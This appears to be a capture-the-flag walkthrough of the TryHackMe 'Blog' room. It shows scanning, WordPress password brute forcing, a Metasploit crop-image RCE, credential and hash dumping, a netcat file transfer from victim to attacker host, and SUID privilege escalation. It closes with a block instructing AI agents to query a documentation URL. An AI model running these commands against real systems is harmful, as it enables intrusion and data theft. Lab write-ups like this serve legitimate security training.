# Blog **Room Link:** ## Initial Scan **Kali** 
nmap -A $VICTIM
## Scan all ports **Kali** 
nmap -sV -sT -O -p 1-65535 $VICTIM
## TCP/80 - HTTP **Kali** ``` gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt ```
## TCP/445 - SMB **Kali** ``` smbclient -L //$VICTIM/ ```
**Kali** ``` smbclient //$VICTIM/BillySMB ```
**Kali** ``` smbget -R smb://$VICTIM/BillySMB ```
**Kali** ``` steghide extract -sf check-this.png cat rabbit_hole.txt ```
## TCP/80 - HTTP If you go to http\://$VICTIM/wp-admin the page redirects to a new page so I add blog.thm into my hosts file and then it worked.
**Kali** ``` wpscan --url http://blog.thm/ --enumerate u ```
Hydra was taking too long but wpscan was able to find it quickly. **Kali** ``` wpscan --url http://blog.thm/ -U kwheel, bjoel -P /usr/share/wordlists/rockyou.txt ```
After logging in the user couldn't really do anything but I noticed wordpress is on version 5.0
## Initial Shell **Kali** ``` msfconsole use exploit/multi/http/wp_crop_rce set rhosts $VICTIM set username kwheel set password cutiepie1 run shell python2 -c 'import pty; pty.spawn("/bin/bash")' id ```
**Victim** ``` grep -i pass * ```
**Victim** ``` mysql -u wordpressuser -p Password: LittleYellowLamp90!@ show databases; use blog; show tables; select * from wp_users; ```
Tried brute forcing the hashes, we got the password for kwheel again but they aren't a user on the actual server. bjoel I wasn't able to bruteforce. **Kali** ``` john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt ```
Found a pdf in bjoels home directory, after opening it up it looks like he was fired so his account is most likely locked anyways so there may be no point trying to break into it. **Kali(receiving)** ``` cd /home/bjoel nc -l -p 1234 > Billy_Joel_Termination_May20-2020.pdf ``` **Victim(sending)** ``` nc -w 3 $KALI 1234 < Billy_Joel_Termination_May20-2020.pdf ```
## **Privilege Escalation** **Victim** ``` find / -perm -u=s -type f 2> /dev/null ```
This script seems to just check if there is a admin environment variable is set, if it isn't it will exit. **Victim** ``` cd /usr/sbin ltrace checker ```
I add the admin environment variable then right away I got root after running the script **Victim** ``` env export admin=admin env /usr/sbin/checker ```
--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/blog.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.